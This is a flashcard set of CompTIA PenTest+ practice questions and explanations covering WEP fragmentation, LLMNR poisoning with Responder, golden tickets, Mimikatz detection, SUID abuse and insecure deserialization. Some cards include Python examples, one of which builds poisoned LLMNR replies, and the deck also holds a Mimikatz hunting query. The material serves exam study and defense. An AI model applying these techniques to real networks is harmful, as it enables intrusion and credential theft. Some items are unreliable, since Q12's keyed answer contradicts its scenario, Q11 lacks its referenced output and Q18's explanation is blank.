CompTIA PenTest+ (PT0-001) Practice Certification Exams (Jason Dion 2 of 6) Flashcards

1
Q
You are conducting a wireless penetration test against an organization. You have identified that they are using WEP encryption on their wireless access points. You are impatient and do not want to wait to collect enough packets to find a repeated initialization vector. You decide to extract part of the key material from one of the packets and use it to send an ARP request to the AP. Which of the following exploits did you utilize in this attack?
A.Deauthentication attack
B.Downgrade attack
C.Fragmentation attack
D.Karma attack
A

C.Fragmentation attack

Explanation:
OBJ-3.3: A fragmentation attack recovers a portion of the WEP keystream (commonly called the PRGA, after RC4's pseudo-random generation algorithm) rather than the key itself. With even a short piece of keystream, the attacker can craft validly encrypted packets and inject them into the access point. In a fragmentation attack, you extract a small amount of keystream from at least one captured packet and use it to send an ARP request to the AP; if successful, the AP echoes the request back in a packet that reveals more keystream. Repeating this process yields roughly 1,500 bytes of PRGA, enough to encrypt a full-sized frame, at which point a packet-crafting tool (such as packetforge-ng from the aircrack-ng suite) can build ARP requests for injection. The injected traffic forces the AP to generate many new IVs quickly, which speeds up cracking the WEP key; otherwise you would have to wait for enough organic traffic to collect the repeated IVs that the statistical attacks need.

2
Q

A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system’s kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
A.Manually review the syslog server's logs
B.Conduct a service discovery scan on the network
C.Conduct an OS fingerprinting scan across the network
D.Conduct a packet capture of data traversing the server network

A

C.Conduct an OS fingerprinting scan across the network

Explanation:
OBJ-2.1: Operating system fingerprinting with a tool such as nmap (nmap -O) identifies which operating system, and often which version, each host appears to be running, giving you a list of the servers that are possibly affected. You can then focus further inspection and scanning on just those hosts. Manually reviewing the syslog server's logs would take too long and would miss servers that do not forward their logs to it. A packet capture would only reveal servers that actively transmit data during the capture window. A service discovery scan does not reliably identify which operating system a server runs; for example, seeing Apache on port 80 does not tell you whether the underlying host is Linux or Windows.

3
Q
During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords?
A.Rainbow table attack
B.Brute force attack
C.Cognitive password attack
D.Birthday attack
A

C.Cognitive password attack

Explanation:
OBJ-2.4: A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this type of authentication can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin's email account was hacked because a high schooler used the "reset my password" feature on Yahoo's email service to reset her password using information that was publicly available about her (such as her birthday, high school, and other such details).

4
Q

You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (SELECT THREE)
A.Whitelist all specific IP blocks that use this application
B.Rename the URL to a more obscure name
C.Require two-factor authentication for access for the application
D.Conduct a penetration test against the organization's IP space
E.Change the username and default password
F.Require an alphanumeric passphrase for the application's default password

A

A.Whitelist all specific IP blocks that use this application
C.Require two-factor authentication for access for the application
E.Change the username and default password

Explanation
OBJ-5.3: First, change the username and default password, since using default credentials is extremely insecure. Second, implement a whitelist of the specific IP blocks that need access to the application's administrative web frontend, since that should be only a few system administrators and power users. Third, require two-factor authentication for access to the application, since two-factor authentication provides more security than a simple username and password combination. You should not rename the URL to a more obscure name, since security by obscurity is not considered a good security practice. You also should not require an alphanumeric passphrase for the application's default password: since it is a default password, you cannot change the password requirements without the vendor conducting a software update to the application. Finally, while it may be a good idea to conduct a penetration test against the organization's IP space to identify other vulnerabilities, doing so will not remediate this identified vulnerability.

5
Q

A cybersecurity analyst conducts proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Query: “mimikatz” NOT “EventCode=4658” NOT “EventCode=4689” EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on?
A.Processor consumption
B.Unauthorized software
C.Irregular peer-to-peer communication
D.Data exfiltration
A

B.Unauthorized software

Explanation
OBJ-4.2: This is a difficult question, but the keyword in the query is "mimikatz." Mimikatz is a leading post-exploitation tool that dumps plaintext passwords, hashes, PINs, and Kerberos tickets from memory. It also enables pass-the-hash, pass-the-ticket, and Golden Ticket attacks, which make post-exploitation lateral movement within a network easy for an attacker. It is unauthorized software on any production host and should be alerted on immediately if discovered. The rest of the query supports the same conclusion: Sysmon EventCode 10 is the ProcessAccess event, which records one process opening a handle to another, and the fields being counted (SourceImage, TargetImage, GrantedAccess) are exactly what you would examine to spot a tool opening lsass.exe with memory-read rights; EventCodes 4658 and 4689 (handle closed and process exited) are excluded because they are noise for this purpose. Data exfiltration is the process by which an attacker moves data stored inside a private network to an external network. Processor consumption is an IoC based on per-process CPU time. Irregular peer-to-peer communication occurs when hosts within a network establish connections over unauthorized ports or transfer data between each other unexpectedly.
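The hunt logic behind the query above, as an added example that is not part of the original flashcard. It runs the same "count by SourceImage, TargetImage, GrantedAccess" aggregation over constructed Sysmon Event ID 10 records (not real telemetry) and flags LSASS access that carries the PROCESS_VM_READ right or PROCESS_ALL_ACCESS, or comes from a binary named mimikatz. The allow-list of legitimate LSASS readers is a hypothetical baseline; build yours from your own fleet.

```python
"""Hunt Sysmon Event ID 10 (ProcessAccess) records for credential-dumping style
access to lsass.exe, mirroring the "stats count by" logic in the Splunk query."""
from collections import Counter

# Windows process access rights that matter for reading LSASS memory.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Source images that legitimately open LSASS with read rights on this hypothetical fleet;
# a real allow-list must come from your own baseline, not from this example.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed sample records (not real telemetry) using Sysmon's Event ID 10 field names.
SAMPLE_EVENTS = [
    {"EventCode": 10, "_time": "2020-06-12T14:01:10", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventCode": 10, "_time": "2020-06-12T14:02:31", "SourceImage": r"C:\Users\bob\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventCode": 10, "_time": "2020-06-12T14:02:32", "SourceImage": r"C:\Users\bob\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventCode": 10, "_time": "2020-06-12T14:05:07", "SourceImage": r"C:\Users\bob\AppData\Local\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventCode": 10, "_time": "2020-06-12T14:06:00", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventCode": 4689, "_time": "2020-06-12T14:06:30", "ProcessName": r"C:\Users\bob\Downloads\mimikatz.exe"},
]


def is_lsass_read(event):
    """True if a ProcessAccess event grants memory-read rights on lsass.exe."""
    if event.get("EventCode") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    return granted == PROCESS_ALL_ACCESS or bool(granted & PROCESS_VM_READ)


def hunt(events, allowed=ALLOWED_SOURCES):
    """Return (findings, stats). findings: (time, source, reason) for suspicious events;
    stats: count by (SourceImage, TargetImage, GrantedAccess), like the query's stats clause."""
    findings = []
    stats = Counter()
    for ev in events:
        if ev.get("EventCode") != 10:
            continue  # the query likewise excludes 4658/4689 noise
        key = (ev["SourceImage"], ev["TargetImage"], ev["GrantedAccess"])
        stats[key] += 1
        source = ev["SourceImage"].lower()
        if "mimikatz" in source:
            findings.append((ev["_time"], ev["SourceImage"], "known credential-dumping tool name"))
        elif is_lsass_read(ev) and source not in allowed:
            findings.append((ev["_time"], ev["SourceImage"],
                             f"unexpected LSASS access with GrantedAccess={ev['GrantedAccess']}"))
    return findings, stats


if __name__ == "__main__":
    found, counts = hunt(SAMPLE_EVENTS)
    for key, n in counts.items():
        print(n, *key)
    for f in found:
        print("ALERT:", *f)
```

Real attackers rename their binaries, so the name match is only a convenience; the GrantedAccess check (0x1010 and 0x1410 are the values Mimikatz-style dumpers typically request, and 0x1fffff is full access) against an allow-list is the part of this logic that survives renaming.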

6
Q

A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix)   (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETag: "1986-69b-123a4bc6"
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of action did the analyst perform, based on the command and response above?
A.SQL Injection
B.Banner Grabbing
C.Querying the Whois database
D.Cross-site scripting
A

B.Banner Grabbing

Explanation:
OBJ-4.2: The analyst conducted banner grabbing, a technique for learning about a system and the services running on its open ports from what those services volunteer when you connect. Here, "nc test.diontraining.com 80" opened a TCP connection to the web server with netcat, and the analyst then typed an HTTP request (HEAD / HTTP/1.1, followed by a blank line). The response headers reveal the server software and version (Apache 2.0.46) and the operating system (Red Hat Linux). Treat such banners as a starting point rather than proof: administrators can suppress or alter the Server header (with Apache's ServerTokens directive, for example), so version claims should be confirmed with other evidence before you report them. Cross-site scripting (XSS) is an injection attack in which malicious scripts are injected into otherwise benign and trusted websites, typically delivered through the web application to another end user's browser. SQL injection inserts malicious SQL statements into an entry field for execution against a data-driven application, for example to dump the database contents to the attacker. A WHOIS query returns registration information about the domain's owner, not the server's software or operating system.

7
Q
You are conducting a vulnerability assessment when you discover a critical web application vulnerability on one of your Apache servers. Which of the following files would contain the Apache server's logs if your organization uses the default naming convention?
A.apache_log
B.access_log
C.httpd_log
D.http_log
A

B.access_log

Explanation:
OBJ-2.3: On Apache web servers, requests are recorded in a file named access_log (errors go to error_log). On Red Hat-family systems the default path is /var/log/httpd/access_log; Debian-based builds use /var/log/apache2/access.log. The file records every request the server processed, so it is where you would look for evidence of attempts against the web application vulnerability you found. The other names are not Apache's default log files: httpd_log is used by the WebSphere Application Server for z/OS, a very outdated server from the early 2000s; http_log is actually a C header (http_log.h) in the Apache source that declares the logging API and contains no log entries; and apache_log is an executable program that parses Apache log files into a Postgres database.
8
Q
What should administrators perform to reduce a system's attack surface and remove unnecessary software, services, and insecure configuration settings?
A.Hardening
B.Harvesting
C.Stealthing
D.Windowing
A

A.Hardening

Explanation:
OBJ-5.3: Hardening is the process of securing a system by reducing its attack surface, which grows with the number of functions a system performs; in principle, a single-function system is more secure than a multipurpose one. Reducing the available avenues of attack typically includes changing default passwords, removing unnecessary software and unused accounts, and disabling or removing unnecessary services. Windowing refers to displaying more than one item at a time on a screen in separate windows. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.

9
Q
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?
A.Service level agreement
B.Memorandum of understanding
C.Rules of engagement
D.Acceptable use policy
A

C.Rules of engagement

Explanation:
OBJ-1.1: While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.

10
Q
Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command?
A.nmap -Pn 10.0.0.0/25
B.nmap -Pn 10.0.0.0,1.0.2.0,3.0
C.nmap -Pn 10.0.0.0/23
D.nmap -Pn 10.0.0-3.0
A

D.nmap -Pn 10.0.0-3.0

Explanation:
OBJ-4.1: Nmap lets you give a range for any octet of an IPv4 address by using a dash, so 10.0.0-3.0 expands to the four addresses 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0, one for each subnet, which is why it is the intended answer here. Note, though, that a range in the third octet only expands that octet: to scan every host in all four /24 networks you would write 10.0.0-3.0-255 (or 10.0.0.0/22, since 10.0.0.0 through 10.0.3.255 is a single /22). The other options do not work: 10.0.0.0/25 is only half of the first subnet, 10.0.0.0/23 covers just 10.0.0.0 through 10.0.1.255, and option B is not a valid nmap target specification. The -Pn option does not make the scan "host-only"; it skips host discovery (the ping probes) and treats every address as up, which is useful when ICMP is filtered but also means nmap will spend time port-scanning addresses that are not in use.
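To make the target-expansion rules concrete, here is an added example (not part of the original flashcard) that expands nmap-style IPv4 target specifications the way nmap does: per-octet ranges and lists, the `*` and bare `-` wildcards, and CIDR notation. It goes a little beyond the question by handling lists and open-ended ranges, and includes a check that tells you whether a given specification actually covers every address of the four subnets named in the question.

```python
"""Expand nmap IPv4 target specifications (octet ranges, lists, wildcards, CIDR)
into the exact set of addresses nmap would scan."""
import ipaddress
from itertools import product


def expand_octet(spec):
    """Expand one octet field: '3', '0-3', '1,5,7-9', '*' or '-' (both mean 0-255)."""
    values = set()
    for part in spec.split(","):
        if part in ("*", "-"):
            values.update(range(256))
        elif "-" in part:
            lo, hi = part.split("-", 1)
            lo = int(lo) if lo else 0      # nmap allows '-5' (0-5) and '250-' (250-255)
            hi = int(hi) if hi else 255
            values.update(range(lo, hi + 1))
        else:
            values.add(int(part))
    if any(v < 0 or v > 255 for v in values):
        raise ValueError(f"octet out of range: {spec}")
    return sorted(values)


def expand_target(target):
    """Return every address (as a string) that one nmap target specification denotes."""
    if "/" in target:
        net = ipaddress.ip_network(target, strict=False)
        return [str(ip) for ip in net]   # nmap scans the network and broadcast addresses too
    octets = target.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 target: {target}")
    ranges = [expand_octet(o) for o in octets]
    return [".".join(str(o) for o in combo) for combo in product(*ranges)]


def covers_subnets(target, subnets):
    """True if the target specification scans every address of each subnet given in CIDR form."""
    scanned = set(expand_target(target))
    return all(str(ip) in scanned for cidr in subnets for ip in ipaddress.ip_network(cidr))


# The four /24 networks from the question.
SUBNETS = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]

if __name__ == "__main__":
    for spec in ("10.0.0-3.0", "10.0.0.0/23", "10.0.0-3.0-255", "10.0.0.0/22"):
        hosts = expand_target(spec)
        print(f"{spec:16} -> {len(hosts):5} addresses, covers all four subnets: {covers_subnets(spec, SUBNETS)}")
```

Running it shows that 10.0.0-3.0 yields exactly four addresses while 10.0.0-3.0-255 and 10.0.0.0/22 each yield 1,024; if you want to be sure of what a specification expands to before a long scan, nmap's own `-sL` (list scan) prints the same thing without sending a packet.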

11
Q

You are conducting a network-based exploit against a Windows-based network. After running Responder in Kali Linux for about 15 minutes, you see the following output on your screen:
To validate if your attack was successful, you also analyze a Wireshark packet capture of this attack. A portion of that Wireshark packet capture is shown here:
Based on the output and packet capture above, which of the following types of exploits did you use?
A.Pass the hash attack
B.FTP Exploit
C.LLMNR Exploit
D.DNS cache poisoning

A

C.LLMNR Exploit

Explanation:
OBJ-3.2: Windows hosts use DNS first for name resolution; when DNS cannot resolve a name (a typo, a short single-label name, or a missing record such as "wpad"), they fall back to Link-Local Multicast Name Resolution (LLMNR, introduced in Windows Vista) and then to the older NetBIOS Name Service (NBNS). Both fallbacks simply ask the local network segment "who has this name?", and any host on the segment can answer, which is what Responder in Kali Linux exploits: it listens for LLMNR, NBNS, and mDNS queries and replies with the attacker's IP. In this example, Responder answers the Windows 7 host's LLMNR query for "wpad" (Web Proxy Auto-Discovery) with the Kali machine's IP instead of the correct one. The first highlighted section of the capture shows that LLMNR query and the poisoned response; the last highlighted section shows the Windows 7 host requesting wpad.dat from the Kali host and, when prompted for proxy authentication, sending its credentials (an NTLM challenge-response that Responder logs for offline cracking or relaying). The easiest clue to the right answer is the capture itself, which clearly shows LLMNR as the protocol in frames 1212 through 1216 during the query and response. The question's mention of waiting 15 minutes is a weaker clue: Responder is passive until a host on the segment issues a name lookup that DNS cannot answer, so there is typically a wait before the first capture. For this question the relevant portion is highlighted in red, but don't expect the exam to be nearly as kind!
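The exchange described above at the wire level, as an added example that is not part of the original flashcard and not Responder's code: LLMNR (RFC 4795) reuses the DNS message format over UDP port 5355, multicast to 224.0.0.252, so a poisoner only has to copy the transaction ID and question from the victim's query and append an A record pointing at itself. The victim name "wpad", the transaction ID 0x1234 and the attacker address 10.0.0.99 are constructed values.

```python
"""Build and decode LLMNR messages (RFC 4795: DNS wire format over UDP 5355 to 224.0.0.252)
to show what a Windows host asks for and what a poisoner such as Responder sends back."""
import socket
import struct

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
TYPE_A, CLASS_IN = 1, 1
QR_RESPONSE = 0x8000    # QR bit in the flags word


def encode_name(name):
    """Encode 'wpad' as DNS labels: \\x04wpad\\x00."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Decode labels starting at offset, following compression pointers.
    Returns (name, offset just past the name field in the original position)."""
    labels, end = [], None
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                      # compression pointer (0xC0 | offset)
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def build_query(name, txid):
    """The query a Windows host multicasts when DNS fails to resolve a single-label name."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, QD, AN, NS, AR
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_poisoned_response(query, answer_ip, ttl=30):
    """The unicast reply a poisoner sends: same ID and question, plus an A record for itself."""
    txid = struct.unpack("!H", query[:2])[0]
    _name, qend = decode_name(query, 12)
    question = query[12:qend + 4]                      # labels + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, QR_RESPONSE, 1, 1, 0, 0)
    answer = (struct.pack("!H", 0xC00C) +              # pointer to the name in the question
              struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4) +
              socket.inet_aton(answer_ip))
    return header + question + answer


def parse_message(data):
    """Parse header, questions and A-record answers of an LLMNR (or DNS) message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(data, offset)
        qtype, qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        answers.append((name, rtype, ttl, socket.inet_ntoa(rdata) if rtype == TYPE_A else rdata))
    return {"id": txid, "is_response": bool(flags & QR_RESPONSE),
            "questions": questions, "answers": answers}


if __name__ == "__main__":
    # Constructed exchange: the victim asks for "wpad"; the attacker at 10.0.0.99 answers first.
    q = build_query("wpad", 0x1234)
    r = build_poisoned_response(q, "10.0.0.99")
    print("query    ->", parse_message(q))
    print("response ->", parse_message(r))
```

Nothing in the protocol authenticates the answer, which is the whole vulnerability; the remediation is to turn LLMNR off (the "Turn off multicast name resolution" Group Policy setting) and disable NetBIOS over TCP/IP on the adapter, and, failing that, to register a valid wpad entry in DNS so clients never fall back to multicast for it.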

12
Q
You are conducting a penetration test against an organization's Windows network. You have dumped the hash of their krbtgt account from the server's memory and used it to create golden tickets. Which of the following types of privilege escalation have you performed?
A.Insecure sudo
B.DLL Hijacking
C.cPassword extraction
D.Kerberoasting
A

D.Kerberoasting

Explanation:
OBJ-3.5: The deck's answer is Kerberoasting, the only Kerberos-related option offered, but note that the scenario as written is actually a Golden Ticket attack, and the two are different techniques. In a Golden Ticket attack, an attacker who already has domain-admin level access (for example by running Mimikatz on a domain controller or performing a DCSync) obtains the NT hash of the krbtgt account, the key used to encrypt and sign every ticket-granting ticket in the domain, and then forges TGTs for any user, including non-existent ones, that stay valid until the krbtgt password has been changed twice. Kerberoasting, by contrast, needs only an ordinary domain account: the attacker requests service tickets for accounts that have a service principal name (SPN) registered, and because part of each ticket is encrypted with that service account's password hash, the tickets can be cracked offline to reveal the plaintext password. Many Windows services run with administrative privileges, and most system administrators don't frequently change these passwords, so either technique can give an attacker access to a domain for a long period of time.

13
Q

You are analyzing the following network utilization report because you suspect one of the servers has been compromised.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
IP Address     Name         Uptime            Historical   Current
192.168.20.2   web01        7D 12H 32M 06S    42.6 GB      44.1 GB
192.168.20.3   webdev02     4D 07H 12M 45S    1.95 GB      2.13 GB
192.168.20.4   dbsvr01      12D 02H 46M 14S   3.15 GB      24.6 GB
192.168.20.5   marketing01  2D 17H 18M 41S    5.2 GB       4.9 GB
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the report above, which of the following servers do you suspect has been compromised and should be investigated further?
A.web01
B.webdev02
C.dbsvr01
D.marketing01
A

C.dbsvr01

Explanation:
OBJ-3.7: Because of the considerable increase in network utilization on dbsvr01, it should be suspected of compromise and investigated further. The server's historical utilization is only 3.15 GB, but the current figure is 24.6 GB, nearly eight times its baseline, while every other server stayed roughly constant. An unexplained jump of this size on a database server is consistent with a compromise followed by a data breach or data exfiltration, although it is only an indicator; the next step is to confirm it with flow or packet data showing where the extra traffic went.

14
Q

Your company has just announced a change to an “API first” model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability?
A.Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution
B.Lack of input validation could allow for a SQL injection attack
C.Lack of input validation could lead to a cross-site scripting attack
D. Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited

A

A.Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution

Explanation:
OBJ-2.4: With an API-first model, objects in memory on one system are serialized, sent over the API, and deserialized on another. If the API consumer is malicious, they can craft a serialized object that, when deserialized, instantiates an attacker-chosen class or invokes attacker-chosen code, which is why insecure deserialization is listed in the OWASP Top 10 as a path to remote code execution. The defenses are to accept serialized objects only from trusted sources (or to protect them with a digital signature or HMAC so tampering is detected before parsing), and to avoid serialization formats that carry arbitrary object types at all, exchanging only primitive data (for example JSON with strict schema validation) or enforcing a strict allow-list of classes the deserializer may instantiate. Cross-site scripting and SQL injection are input-validation flaws rather than the basis of a deserialization attack. Insufficient logging and monitoring would prevent an analyst from detecting that a deserialization vulnerability was exploited, but it is not what the attack itself relies on.
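The vulnerability and both defenses side by side, as an added example that is not part of the original flashcard, using Python's pickle as the native-object serializer (the same pattern applies to Java serialization, PHP unserialize, .NET BinaryFormatter and friends). The payload's `__reduce__` hook tells the deserializer to call `exec` on attacker-chosen source; to keep the example harmless, that source only sets an environment variable named PENTEST_DESER_DEMO (a constructed marker). The shared HMAC key is likewise a constructed example value.

```python
"""Insecure deserialization with pickle: a serialized object that runs code on load,
a class allow-list that blocks it, and the preferred design (signed primitive-only JSON)."""
import hashlib
import hmac
import io
import json
import os
import pickle

DEMO_VAR = "PENTEST_DESER_DEMO"   # harmless marker the payload sets instead of doing real damage


class Malicious:
    """__reduce__ answers 'how do I rebuild this object?' with 'call exec(...)';
    pickle stores that instruction, and the victim's pickle.loads() carries it out."""
    def __reduce__(self):
        return (exec, (f"import os; os.environ['{DEMO_VAR}'] = '1'",))


def make_malicious_blob():
    """What an attacker would POST to an API that deserializes client objects."""
    return pickle.dumps(Malicious())


def payload_fired():
    return os.environ.get(DEMO_VAR) == "1"


def vulnerable_load(blob):
    """What an 'API first' service must never do with client-supplied bytes."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list defense: refuse to resolve any global except a few primitive containers.
    Plain dicts, lists, strings and numbers never go through find_class at all."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def restricted_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def safe_roundtrip(obj):
    """Primitive data survives the restricted unpickler unchanged."""
    return restricted_load(pickle.dumps(obj))


# Preferred design: exchange primitive data only (JSON) and authenticate it with an HMAC,
# so the server rejects anything it cannot verify before it parses a single byte.
KEY = b"example-shared-secret-rotate-me"   # constructed example key


def sign(payload, key=KEY):
    body = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return tag + b"." + body


def verify_and_load(blob, key=KEY):
    tag, _, body = blob.partition(b".")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed; payload rejected before parsing")
    return json.loads(body)


if __name__ == "__main__":
    evil = make_malicious_blob()
    try:
        restricted_load(evil)
    except pickle.UnpicklingError as e:
        print("restricted_load blocked it:", e)
    vulnerable_load(evil)
    print("vulnerable_load executed attacker code:", payload_fired())
    signed = sign({"user": "alice", "role": "viewer"})
    print("verified:", verify_and_load(signed))
    try:
        verify_and_load(signed.replace(b'"viewer"', b'"admin"'))
    except ValueError as e:
        print("tampered payload:", e)
```

The allow-list is a mitigation for code you cannot change; the JSON-plus-HMAC design is the one to aim for in a new API, because the server then never has to trust a type name that the client chose.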

15
Q
In 2014, Apple's implementation of SSL had a severe vulnerability that, when exploited, allowed an attacker to gain a privileged network position that would allow them to capture or modify data in an SSL/TLS session. This was caused by poor programming in which a failed check of the connection would exit the function too early. Based on this description, what is this an example of?
A.Use of insecure functions
B.Insecure object reference
C.Improper error handling
D.Insufficient logging and monitoring
A

C.Improper error handling

Explanation:
OBJ-2.3: This is an example of an improper error handling vulnerability. A well-written application must handle errors and exceptions gracefully; the main goal is that a failure never leaves the application in a state that lets an attacker execute code or perform an injection attack. One famous example is Apple's "goto fail" bug described above: a duplicated goto statement jumped past the remaining signature checks while the error variable still held the success value, so the handshake was accepted without the verification having been completed. For more details on this particular vulnerability, see CVE-2014-1266. Insecure object reference refers to a reference to an internal implementation object, such as a file or database key, being exposed to users without any other access control. Insufficient logging and monitoring allows attackers to achieve their goals without being detected because defenders lack the visibility to respond in time. The use of insecure functions occurs in the C language when legacy functions like strcpy() are used; these functions can lead to buffer overflows and other exploits succeeding against a program.

16
Q

During your reconnaissance, you have determined that your client’s employees all use iPhones that connect back to the corporate network over a secure VPN connection. Which of the following methods would MOST likely be the best method for exploiting these?
A.Identify a jailbroken device for easy exploitation
B.Use web-based exploits against the devices web interfaces
C.Use social engineering to trick a user into opening a malicious APK
D.Use a tool like ICSSPLOIT to target specific vulnerabilities

A

A.Identify a jailbroken device for easy exploitation

Explanation:
OBJ-2.5: When targeting mobile devices, first determine whether the company uses iPhones or Android-based devices. iPhones are much harder to attack because, unless the device has been jailbroken, users can normally install only apps that Apple has reviewed and signed through the App Store. A jailbroken phone can sideload apps and other malware, so after identifying a jailbroken device you can use social engineering to trick the user into installing your malicious code and take control of the device. The other options do not fit: an APK is an Android package and will not run on iOS at all, ICSSPLOIT targets industrial control systems rather than phones, and iPhones do not ordinarily expose a web interface to attack.

17
Q
Praveen is currently investigating activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long text strings and then began using the sudo command to carry out actions. What type of attack has just taken place?
A.Social engineering
B.Phishing 
C.Session hijacking
D.Privilege escalation
A

D.Privilege escalation

Explanation:
OBJ-3.5: The use of long query strings points to a buffer overflow attack, and the sudo command confirms the elevated privileges after the attack. This indicates a privilege escalation has occurred. While the other three options may have been used as an initial access vector, they cannot be confirmed based on the question’s details. Only a privilege escalation is currently verified within the scenario due to the use of sudo.

18
Q

You are watching as a penetration tester is conducting an engagement against Dion Training’s network. You see the following commands and output in their terminal:

-=-=-=-=-=-=-
# find / -perm +4000 -user root -type f -print
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/passwd
/usr/games/mahjong
# chmod 4111 /usr/bin/sudo
-=-=-=-=-=-=-
Which of the following vulnerabilities is the penetration tester trying to exploit?
A.Unquoted service path vulnerability
B.Unsecure SUDO vulnerability 
C.Sticky bit vulnerability
D.Kernel vulnerability
A

B.Unsecure SUDO vulnerability

Explanation:
